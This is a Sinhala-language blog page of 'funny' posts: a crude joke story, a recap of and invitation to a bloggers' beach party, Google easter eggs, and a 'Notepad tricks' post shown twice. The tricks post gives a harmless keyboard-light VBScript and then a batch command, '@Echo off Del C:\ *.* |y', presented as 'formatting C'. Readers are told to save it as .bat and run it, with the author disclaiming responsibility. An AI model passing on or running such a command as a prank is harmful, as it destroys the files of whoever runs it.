Showing posts with label funny. Show all posts
( බැක්ග්‍රවුන්ඩ් සවුන්ඩ් කටෙන් දා ගන්න ... )
.......ටි ටි ........................................
Season 01 Episode 01 මෙතැනින් කියවන්න !
<<< අපි පිස්සෝ සීසන් 01 එපිසෝඩ් 02 >>>
සැ . යු .මෙහි එන සියලුම නම් ගම මනක්කල්පිතය
යට ගිය දවස අංගොඩ අගනා ගනයේ පිස්සන් දෙදෙනෙක් වාසය කළේය ...එකෙක්ට අපි නිමල් කියමු .. අනිකට අපි සුනිල් කියමු .. දිනක් මොවුන් දෙදෙනා පාරේ ඇවිද යමින් සිටින විට පාරේ අමුතු හැඩේ දුබුරු පාටට හුරු ගුලියක් දැක්කේය .. නිමල්ට එය පෑගෙන්න ගිය අතර සුනිල් එය වලක්වා ගත්තේය ... පසුව මෙසේ කතාබහක් ඇතිවිය ..
නිමල් : අම්මෝ .. තැන්ක්ස් මචං .. මම එක දැක්කේ නැහැනේ ..
සුනිල් : ඕව මොනවද බන් .. මේ එක මොකක්ද දන්නේ නැහැ නේද බන් ..
නිමල් : එක තමා බන් මාත් බැලුවේ .. මොකක්ද දන්නේ නැහැ ..
සුනිල් : අඩු . .මම එක කාල බලන්නද ... ..ඇ එතකොට බලගත්තහැකි මොකක්ද කියල ..
නිමල් : හා එහෙනම් බලහන්කො .. මමනම් කියන්නේ ඕක බල්ලෙක්ගෙ වැඩක් ..
සුනිල් : හිටු බලන්න .. ( අතට ගෙන කටේ දමා රස කර කර කයි ) .. අම්මට සිරි .. අඩු මේක බලුබෙට්ටක් තමා බන් ...වෙලාවට උබ පෑගුවේ නැත්තේ ..
කතාව අවසානයි ... අම්ම බනිනවා.... මම ගියා .. ජය වේවා ..

මම වන චකස් මෙහෙම බ්ලොග් ලියන්න ගෙන වැඩි කාලයක් නොවේ .. මේ දෙසැමබර් මුල පටන් ගත්තා ... සයිබර් බීච් පාර්ටි ගැන දැන ගත්තේ ඊට සතියකට පසුවය .. එදා පටන් ගෙදර ශේප් කර ගැනීමට මහත් වෙහෙසක් දැරුවෙමි .. ප්‍රයත්නය සාර්ථක විය ..
අපෙ ගෙදර සෙට් එකයි චානු කියල අයිය කෙනෙකුයි එක්ක ගෙදරින් ආවේ 7ට විතරය .. එද්දී උන වැඩ මාරය.. කුජීතය ... :3 .
ආව ගමන් සංවිදායක මණ්ඩලය අපිව සත්තු ගොඩට දැම්මේය ... අනුකම්පා විරහිතව මාව පුසෙක් කළේය ... ඊට පස්සේ අපිට සෙල්ලන් කරන්න කිව්වේය ... සෙල්ලම අනිත් උන්ගේ නැටි ඇල්ලීමය ... අපේ නැට්ට කැඩුන නිසා අපි උඩින්ම චකබ්ලාස්ට් විය ... නැටි නැති කපුටෝ ගේම දෙන්නේය .. උන් දින්නේය ...
ඊලගා අපිට අපෙ නම සමග අපි ලියන බ්ලොග් එක කීමට කීවේය ... අහිංසක ෆේක් අපි එතැනදී අපේ පිවිතුරු බව ලොවට පුජා කළේය ... එතනින් පසු වමනේ යන සීන් එකක් දුන්නේය .. ඒ පොල්ලක් වටේ කරකීමයි ... කණ්ඩායමකට දහයක් සෙට් කරගන්න කිව්වත් අපිට හිටියේ 9 දෙනෙකි .. අනිත් උන්ට 10 දෙනෙකි .. ඒ නිසා අපි පැරදුනේය .. :P
ඊලගට හොදම හරිය ආවේය .. ඒ කෑම කෑමේ අවස්ථාවයි ... ගොඩක් අයව හම්බ උනේ ඒ වෙලෙය .. :3
කෑම කෑවට පස්සේ හැමෝටම වැඩ විය .. ලොකු ලොකු වැඩය .. මඩ ව්‍යාපාරයට කට්ටිය පස් එකතු කලේ ඊලගටය ...
නැවේ නැති උන් ගොඩක් නාගත්තේය .. සමහරු ඇදගෙන නැවේය ... අනිත් එවුන්ට නෑමට සැල්ස්වීම කෙරෙහි රුවන් අයියට සහ සුදු මහත්තය ඇතුළු සම්භාවනීය පිරිසට මාගේ මෙව්වා එක ... තොපිට මාව නැවීමට නොහැකි විය .. :3 නැවේ නැත්තේ DJ කරපු අයිය විතරයිද කොහෙද .. සමිය සල්ලි තිබු නිසා බෙරුනේය ...
නමුත් මට ඊට වඩා ලොල් සීන් විය .. ඊට වගකිව යුත්තේය ගොන් රජාය .. මාත් එක්ක දුවගෙන ගොස් මුහුදට පනිමු කිව්වා ඌ දෙනෝදාහක් ඉදිරියේ මාව මුහුදට තල්ලු කර ඌ ගොඩට ආවේය ... :3
( යකෝ අපේ පිටිපස්සෙන් හිටිය උන් බලන් ඉදන් පැය බාගයක් විතර නක්කලෙට හිනා වෙලා යකු .. >_< )
මන් අහන්නේ සුනාමියක් එහෙම ආවනම් ලංකාවේ බ්ලොග් කීයක් විනාසද ..
සමහරු නිනව් නැති විය .. ඊට වගකිව යුත්තේ කොටට ඇදපු සුද්දීයෝය ..
ඊට පස්සේ මම ගොඩ ආවේ සැහෙන වෙලාවකට පස්සෙය .. ඒ මම මුහුදේ ඉන්නතුරු අපේ අයියගේ වැඩ මට ආරංචි විය .. :3
හිත හොද උන් එමටය .. එනම් හැමෝම එහෙමය .. මම කොහොමද කියා මට පැවසිය නොහැක .. ඔයාලම කියන්ට ..
දියකිදුරියක්ද අපේ බ්ලොග් කරුවන් අතින් සමුහ දුසනයට බදුන් විය .. මෙය සමස්ත බ්ලොග්කරුවන් වෙත කරපු මහත් නින්දාවකි .. මම ඒ ගැන මුකුත්ම කියන්නේ නැහැ ...( අනේ උගේ පතිවත ) එක බලන්න මෙතැනින් යන්න ...
එද්දී මට බයක් තිබුණි .. ඒ මම පොඩිම එකා නිසාය .. ආවම මාව හලයි යන බියද තිබුණි .. නමුත් අයියල අක්කල අංකල්ල එසේ මාව හැලුවේ .නැත ... උන්ට පිං .. මගේ වයස ඔප්පු කිරීමට මට මහත් වෙහෙසක් දැරීමට සිදුවිය ... තාමත් මම කියන්නේ මගේ වයස 15 ...
අන්තිමට අපි හැමෝම නැටුවේය .. නටුවේ නැති උන තවත් බිව්වේය .. නටල නටල වෙරි හිදුනේය .. ආතල් කෝටියකි .. :3
කෙසේ හෝ ඒ සුන්දර හෝර කිහිපය එසේ අවසන් විය ...හිතේ ලොකු දුකක් සමග අපි පිටත් වීමට සැරසුනේය .. හැමෝම අතින් අල්ලාගෙන බදාගෙන වඩාගෙන "හරි මචං .. අයි සෙට් වෙමු " කියද්දී මාර ෆිට් එකක් ආවේය .. හැමෝම සුහද විය .. වයස් බේදය නොදැනුනි ... නලින් අංකල් අයියෙක් විය ..:P
දුකින් වුනත් එන්ට පිටත් වුනු අපිට මේ පෝස්ට් එක ලියද්දිත් හරියට කෙලින් ඉන්නට අමාරුය .. මටත් අනිත් එවුන්ට කියන්න තියෙන්නේ ...
"හරි මචං .. කොහොම හරි ආයිත් සෙට් වෙමු " ...

මේ මමනම් නෙවෙයි ඇ ..
මුහුදේ සිත්තරී
අපේ එවුන් සාස්තර අහනවා ... :P
හැක හැක ..
මුනම් ජැක්සන් වගේ ඕයි ..
මෙව්වා ගැන කියන්න දන්නේ ලෑ ..
හායි හායි යාලුවනේ .. කොහොමද ඔයාලට ඇ .. .. හි හි .. හරි හරි .. .. අද මම ඔයාලට පොඩි ආතල් සීන් ටිකක් කියල දෙන්නයි ආවේ .. සමහර අයනම් මේවා දන්නවත් ඇති .. මම මේ කියල දෙන්නේ දන්නේ නැති අයටලු ඇ .. :D .. හැක හැක .. මේක ආතල් එකට හදන වයිරස් එකක් කියල හිතා ගන්නකො .. එතකොට හිතට මොරාල් .. :3
එකටම කියල දෙන්නම් ඔයාගේ Keyboard එකේ තියෙන ලයිට් තුන පිස්සු වට්ටන විදියක් .. ඔව් අනී .. නටනවා කුඩු වෙන්න .. :P
--> හිකි .. ඔයා මුලින්ම Notepad එකක් open කර ගන්නකො ..
--> ඊට පස්සේ ඔයා එකේ මම පහල දීල තියෙන Code එක එකේ කොපි කරගන්න පොඩ්ඩක්වත් වරද්දන්නෙ නැතුව .. :D
--> ඊට පස්සේ එක ඔයාට කැමති නමකින් File Format එක .vbs කියල save කලන්න .. ආ මතක ඇතිව All files දීල save කලන්න ඇ ..
--> හරිද ඇ .. එහෙනම් දැන් ඔයා එක save කරපු එක open කරලා බලන්නකෝ .. මොකක්ද බලන්නේ ... ඔව් ඔව් . keyboard එකේ ලයිට් ටික බලන්න .. :P ..ආතල් නේද ඇ ..
එහෙනම් ඊලගට දිනපොතක් හදා ගන්න හැටි කීල දෙන්නද ..
--> මෙහෙමයි .. මුලින්ම ඔයා Notepad එකක් ඕපන් කලාගෙන එකේ උඩින්ම " .LOG කියල ටයිප් කලන්න .. ( කැපිටල් වලින් )
--> දැන් එක ඕනි තැනක save කලන්න කැමති නමකින් txt file එකක් විදියට .. දැන් එකේ ඔයා ටයිප් කරලා save කලන ඕනි එකක් ටයිප් කලපු දිනෙයි වෙලාවයි එක්කම පෙන්නනවා .. ඇ ..
හොදයි නේද .. :D
ඊලග එක බයානකයි බබා ...
ඕනිනම් කරන්න .. C එක Format කිරීම කියල මාතෘකාවට දා ගන්නකො ..
--> එහෙනම් ඔයා Notepad එකක් open කරලා මම පහල දීල තියෙන කෝඩ් එක කොපි පේස්ට් කරලා කැමති නමකින් .bat file එකක් විදියට save කරන්න . මතක ඇතුව all file දාල save කරන්න ඈ ..
--> හරි ඊට පස්සේ එක run කරලා ..බලන්නකෝ ... හැබැයි මම වගකියනු නොලැබේ ඇ ..
එහෙනම් පොඩි ආතල් එකක් හරි එකෙන් ගත්තනම් මට ඒ ඇති .. මමත් ගිහින් එන්නම් ... තව පොඩි පොඩි ට්‍රික් වගයක් තියෙනෙව .. ඒවා දැන් කියන්න කම්මැලියි අනී .. පස්සේ පොස්ටුවකින් කියන්නම් ..
හෝව් හෝව් .. නිකන්ම යන්නෙපා ඇ .. මේක ඔයාගේ යාලුවන්ටත් බලන්න Share පාරක් එහෙම දාන්න .. කොමෙන්ටුවක් එහෙමත් කොටලා යන්න ඇ ..
එහෙනම් ටටා බායි ඇ ..
ජය වේවා ... !!!
එකටම කියල දෙන්නම් ඔයාගේ Keyboard එකේ තියෙන ලයිට් තුන පිස්සු වට්ටන විදියක් .. ඔව් අනී .. නටනවා කුඩු වෙන්න .. :P
--> හිකි .. ඔයා මුලින්ම Notepad එකක් open කර ගන්නකො ..
--> ඊට පස්සේ ඔයා එකේ මම පහල දීල තියෙන Code එක එකේ කොපි කරගන්න පොඩ්ඩක්වත් වරද්දන්නෙ නැතුව .. :D
Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" wshshell.sendkeys "{NUMLOCK}" wshshell.sendkeys "{SCROLLLOCK}" loop - See more at: http://www.coolhackingtrick.com/2013/01/top-5-cool-notepad-tricks.html#sthash.KeJZrcYz.dpuf
--> ඊට පස්සේ එක ඔයාට කැමති නමකින් File Format එක .vbs කියල save කලන්න .. ආ මතක ඇතිව All files දීල save කලන්න ඇ ..
--> හරිද ඇ .. එහෙනම් දැන් ඔයා එක save කරපු එක open කරලා බලන්නකෝ .. මොකක්ද බලන්නේ ... ඔව් ඔව් . keyboard එකේ ලයිට් ටික බලන්න .. :P ..ආතල් නේද ඇ ..
එහෙනම් ඊලගට දිනපොතක් හදා ගන්න හැටි කීල දෙන්නද ..
--> මෙහෙමයි .. මුලින්ම ඔයා Notepad එකක් ඕපන් කලාගෙන එකේ උඩින්ම " .LOG කියල ටයිප් කලන්න .. ( කැපිටල් වලින් )
--> දැන් එක ඕනි තැනක save කලන්න කැමති නමකින් txt file එකක් විදියට .. දැන් එකේ ඔයා ටයිප් කරලා save කලන ඕනි එකක් ටයිප් කලපු දිනෙයි වෙලාවයි එක්කම පෙන්නනවා .. ඇ ..
හොදයි නේද .. :D
ඊලග එක බයානකයි බබා ...
--> එහෙනම් ඔයා Notepad එකක් open කරලා මම පහල දීල තියෙන කෝඩ් එක කොපි පේස්ට් කරලා කැමති නමකින් .bat file එකක් විදියට save කරන්න . මතක ඇතුව all file දාල save කරන්න ඈ ..
@Echo off Del C:\ *.* |y
--> හරි ඊට පස්සේ එක run කරලා ..බලන්නකෝ ... හැබැයි මම වගකියනු නොලැබේ ඇ ..
එහෙනම් පොඩි ආතල් එකක් හරි එකෙන් ගත්තනම් මට ඒ ඇති .. මමත් ගිහින් එන්නම් ... තව පොඩි පොඩි ට්‍රික් වගයක් තියෙනෙව .. ඒවා දැන් කියන්න කම්මැලියි අනී .. පස්සේ පොස්ටුවකින් කියන්නම් ..
හෝව් හෝව් .. නිකන්ම යන්නෙපා ඇ .. මේක ඔයාගේ යාලුවන්ටත් බලන්න Share පාරක් එහෙම දාන්න .. කොමෙන්ටුවක් එහෙමත් කොටලා යන්න ඇ ..
එහෙනම් ටටා බායි ඇ ..
ජය වේවා ... !!!
වරෙන් යන්න අපිත් එක්ක ..
කන්න බොන්න හිනා වෙන්න ..
බයිලා නැත්නම් හිපොප් කියන්නම් ඔලුවෙන් හිටගෙනම ... :P
ඇ ... මොකක්ද යකු මේ හරුපේ .. මේක බජව් දාන ප්ලේස් එකක්ද .. :3 .. ??
ඇ .. නැහැ නැහැ .. මේක ඇවිත් ආතල් එකක් .. හැක හැක ..පාර්ටි එකක් ..
මේක ඇවිත් යකු අපේ කස්ටිය සෙට් වෙන ලංකාවේ අපේ බ්ලොග්කව්රුවන්ගේ සංසදය මගින් පවත්වන වාර්ෂික ගෙට්ටුව .. ( Get together ) ... හැක හැක ..
එතකොට Blog ලියන එවුන්ට විතරද .. ??? :/
නැහැ නැහැ මචං මචී .. බ්ලොග් ලියන කියවන හැමෝටම .. ඕනි එකෙක්ට .. ගන්න ඇදුමක් .. ගන්න පනිට්ටුවක් .. ගන්න 350 ක් .. එන්න දෙසැම්බර් 21 ..
පනිට්ටුව ඇතුලට නාන්න කලිසමකුත් දා ගන්න ඇ .. ;)
මුහුදු වැල්ලේ ආතල් එකක් ගන්න .. පාට කරපු වතුර එහෙම බොන්න ... ( වතුර ) .. :3 ..
ලාවට ලාවට සින්දුවක් කියල පොඩි කයියක් දාල බුකියේ යාළුවො ඇත්තටම හම්බ වෙන්න .. එනවා නේද .. හැ .. කුප්ප වැඩ වැහි වහින මේ සැන්ද ව .. උදේ අටේ ඉදන් හවස හතර වෙනකන් .. ඉවරද .. හතරින් පස්සේ ගිනි මැල සංදර්ශනයකුත් තියෙනෙව සහෝ .. ;)
පාර්ටි එක තියෙන්නේ ගල්කිස්ස JO JO ප්ලේස් හොටෙල් එකේ ..
ක්‍රීඩා ගොඩක් .. ෆුල් ෆේස් හෙල්මට් දාගෙන වැලි කෑම ඇතුළු ගොඩක් දේවල් එදාට .. හොද හොද සෙල්ලම් රෑ වෙන ජාමෙට ඇ .. ;)
අහ එහෙනම් එනවනේ උයා .. එහෙනම් මෙන්න මේ ෆෝම් එක පුරෝලා ඔයා එනවා කියල අපිට හරියටම කියන්න ඇ ..
මේ පාර්ටි එකේ ෆේස්බුක් Event එකට මෙතනින් ගිහින් පාර්ටි එකට කලින් ආතල් ගන්න .. :D
මම කිව්වා ඇති වගේ නේ .. වැඩි විස්තර මෙතැනින් ගිහින් බලන්නකෝ ..
මම තමා මෙතන ඉන්න පොඩිම එකා .. වයස 15 නංගිලා ඉන්නවනම් එක්කන් එන්න ... මට කම්මැලියිනෙ .. ;) ..
මම බලා ගන්නම් . ආ එදාට ආවම පොඩි අහිංසක පාට කොන්දේ තට්ටේ ගාපු ලාමක කොල්ලෙක් හම්බු උනොත් ඒ මම නෙවෙයි ඇ .. :P .. ඇවිත් කතා කලන්න ...
එහෙනම් අනිවා එනවා නේද .. මමත් එනවා .. ඔයත් එන්න ඇ .. එතකන් ටටා ..

.ඇ ... ඔන්න කම්මැලි කමේ ඉන්න ඔයාලට මම ගෙනාව පොඩි ආතල් සීන් ටිකක් ... ආතල් with Google ..හා හා ..ඔය ඉතින් .. :3 ...
මෙව්වා මේ මම එහෙම කරපු මම එහෙම කරපු වැඩ නෙවෙයි ඇ ... මමත් මේ ඔය එක එක මුඩුක්කු වලින් හොයා ගත්තු එව්වා තමා ..
බලන්නකෝ එහෙනම් ...පහලින් කියල දීල ඇති ආතල් ගන්න හැටි ... ;) ( 18- )
ආතල් ගන්නේ මෙහෙමයි ...
ගුගල් එකේ ඔය එක එක ගොන් සීන් ..අන්න ඒවා අපිට ජොලි .. මෙව්වා කොරල බලන්නකෝ ... :D
--> " tilt " කියල ටයිප් කරලා බලන්න ගුගල් එකේ .. :P
--> ඊලග එක මැජික් එකක් .. මෙතනින් ගියාම ගුගල් වගේම page එකක් පෙනෙයි .. එකේ සුදු පාට හරියේ ක්ලික් කරලා ඔය O අකුරු දෙක උඩ ඇගිලි දෙක තියන්නකෝ .. මැජික් එකක් කියන්න යාලුවොන්ට ඇ .. මම කිව්වේ කියන්න .එපා .. ( කරන්ට් එක වදින මොනිටර් තියෙන එවුන්ට දෙවි පිහිටයි ! )
--> ඊලගට ඔන්න ගුගල් ලොකු වෙන්නයි යන්නේ ඇ .. නැහැ නැහැ .. එහෙම එකක් නෙවෙයි ... :P ගුගල් මත් නෙවෙයි .. ඒ වගේ වෙන එකක් ... :D එක බලන්න ඕනිනම් මෙතනින් යන්න ඇ ...
--> ඊලගට ඔන්න ගුගල් ආයිමත් පොඩි වෙන්න යන්නේ .. ගුගල් වගේ එකක් ඇ .. :P එක මෙතැනින් බලන්නකෝ ...
--> ගුගල් search රිසල්ස් ගැන binary වලින් බලා ගන්න ආසද ... හැබැයි ටිකක් අමාරු වෙයි ... එහෙනම් ... " binary "කියල google සර්ච් කරන්නකෝ ...
--> ඉස්සර මතකද සුති කාලේ කාටුන් එකක් pacman කියල .. අන්න එකේ game එක ගුගල් එකේ තිබිල මට හම්බු .උනා ... බලන්නකෝ එහෙනම් එකත් ... එකට මෙතැනින් යන්න ඇ ... :v
--> නිකන් කහන අමාරුවක් වගේ තියෙනේවනම් google එකේ ආසාවට සර්ච් කරලා බලන්න " Zerg rush " කියල .. හපුයි .. මමනම් ආයි එක බලන්නේ නැහැ ... සිස් ..
--> ඊලගට ගුගල් මෙන්න loca කියල එක්කෙනෙක් එක්ක නටනවා .. ...හම්මෝ .. එකනම් 5+ ඇ ... :3 මෙතනින් බලන්නකෝ ...
--> මොකෝ කියන්නේ .. පෙරලෙමුද ... නැහැ නැහැ පෙරලොමු .. කාවද ..??? වෙන කාවද ගුගල් අයියව ... :P .. ගුගල් එකේ සර්ච් කරන්න " Do a barrel roll " කියල ... ඇ .. ආතල් ද ... දැන් ...
--> ඊලගට මෙන්න ගුගල් හි අදහා ගත නොහැකි කඩා වැටීම ... :3 .. බයද ... ගුගල් එකට ගිහින් සර්ච් කරන්නකෝ " google gravity trick " කියල ..ඇ .. මුකුත් උනේ නැහැ නේද .. හු හු .. එහෙනම් පලවෙනි රිසල්ට් එක ක්ලික් කරන්න ... ඇ .. මුකුත් උනේ නැහැ නේදෝ ... ( ඔයාට )

--> හැක හැක .. කන්නාඩියෙන් ගුගල් කිව්වලු ... :3 .. මේක හදල තියෙන්නේ කෙමිස්ට්‍රි වලින් ඇ ... ඒ ලෙවල් උන් බය උනාද මන්ද ... :3 ..
කන්නාඩියෙන් ගුගල් බලන්න මෙතැනින් යන්න ...
--> මෙන්න අන්තිම ලල් එක ... මේක ගුගල් නෙවෙයි .. ඒ වගේ එකක් .. යන්නකෝ මෙතැනින් ...
ඒ උනාට ගුගල් අයියට ඔහොම වද දෙන්න එපා ...හැ .. හරිම ලොල් සහගතයි නේද .. මම යනවා .. මේක අතුරු පෝස්ට් එකක් ඇ ... :3 .. ආයිත් මේ වගේ ගොන් ආතල් සෙට් උනොත් ඔයාලට කියන්නම් .. එහෙනම් කොමෙන්ට් එහෙකුත් දාල යන්න .. ජය වේවා ... !!!